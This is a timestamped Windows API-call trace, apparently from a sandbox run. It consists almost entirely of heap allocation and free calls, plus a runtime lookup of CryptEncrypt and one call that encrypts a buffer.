1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e514f0 [0234.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0234.740] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f530 [0234.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0234.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0234.741] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f16e68*, pdwDataLen=0x8cef60*=0x2641, dwBufLen=0x2648 | out: pbData=0x2f16e68*, pdwDataLen=0x8cef60*=0x2648) returned 1 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0234.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0234.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0234.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0234.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0234.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0234.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0234.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0234.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0234.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0234.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0234.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2648) returned 0x2f194b8 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 